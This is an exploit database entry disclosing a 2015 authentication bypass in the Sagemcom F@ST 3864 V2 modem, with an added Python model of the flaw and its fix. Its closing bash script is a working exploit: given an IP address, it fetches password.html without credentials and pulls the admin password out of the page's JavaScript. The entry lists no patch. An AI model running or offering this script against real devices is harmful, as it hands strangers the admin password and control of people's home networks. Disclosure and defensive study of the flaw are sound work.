vendor: F@ST 3864 V2
by: Cade Bull
CVSS: 7.5 (HIGH)
Authentication Bypass
CWE: 287
Product Name: F@ST 3864 V2
Affected Version From: 7.253.2_F3864V2_Optus
Affected Version To: 7.253.2_F3864V2_Optus
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2015

Sagemcom 3864 V2 get admin password

The Sagemcom modem does not authenticate users when they request pages, only when they post forms. The password.html page loads the admin password in clear text and stores it in JavaScript, which is viewable without any credentials.

Mitigation:

Ensure that authentication is required for all pages and that passwords are not stored in plain text.
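
The mitigation above, modelled as an added example (not code from the advisory or from the Sagemcom firmware): a handler that checks authentication only on POST, next to one that checks every request and never renders the stored password. The handler names, the public-path list, the page markup and the sample password are assumptions made for illustration.

```python
"""Constructed model of the flaw and its fix; not firmware code."""
import hashlib
import hmac
import os

ADMIN_PLAINTEXT = "example-admin-pw"   # constructed sample value
_SALT = os.urandom(16)
# Hardened storage: keep only a salted, stretched hash of the password.
ADMIN_HASH = hashlib.pbkdf2_hmac("sha256", ADMIN_PLAINTEXT.encode(), _SALT, 100_000)

PUBLIC_PATHS = {"/login.html"}         # hypothetical: only the login page is public


def vulnerable_handler(method, path, authenticated):
    """Behaviour the advisory describes: only form posts are authenticated."""
    if method == "POST" and not authenticated:
        return 401, ""
    if path == "/password.html":
        # The clear-text password is embedded in the page's JavaScript.
        return 200, "<script>pwdAdmin = '%s';</script>" % ADMIN_PLAINTEXT
    return 200, "<html>ok</html>"


def hardened_handler(method, path, authenticated):
    """Authenticate every request, whatever the method; never emit the secret."""
    if path not in PUBLIC_PATHS and not authenticated:
        return 401, ""
    if path == "/password.html":
        # The form only collects a new password; the current one stays on the device.
        return 200, "<form method='post'><input type='password' name='new'></form>"
    return 200, "<html>ok</html>"


def verify_password(candidate):
    """Check a login attempt against the stored hash in constant time."""
    digest = hashlib.pbkdf2_hmac("sha256", candidate.encode(), _SALT, 100_000)
    return hmac.compare_digest(digest, ADMIN_HASH)


if __name__ == "__main__":
    for handler in (vulnerable_handler, hardened_handler):
        status, body = handler("GET", "/password.html", False)
        print(handler.__name__, status, "secret in body:", ADMIN_PLAINTEXT in body)
```
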

Exploit-DB raw data:

#!/bin/bash
#########################################
# Exploit Title: Sagemcom 3864 V2 get admin password
# Date 2015-08-15
# Author: Cade Bull
# Software Link: null
# Tested on: Sagemcom F@ST 3864 V2
# Version: 7.253.2_F3864V2_Optus
#########################################

# The sagemcom modem does not authenticate users when requesting pages, only whilst posting forms
# the password.html page loads the admin password in clear text and stores it in Javascript, which is viewable without any credentials
 
if [ "$1" != "" ]
then
	IP_ADDRESS="$1"
else
	echo "Usage : $0 IP_ADDRESS"
	exit 1
fi
 
USER_PASSWORD=`wget http://$IP_ADDRESS/password.html -t 1 -q -O -  | grep "pwdAdmin" | tr " = " "\n" | grep "'" | tr -d "';" `
echo "admin password = $USER_PASSWORD"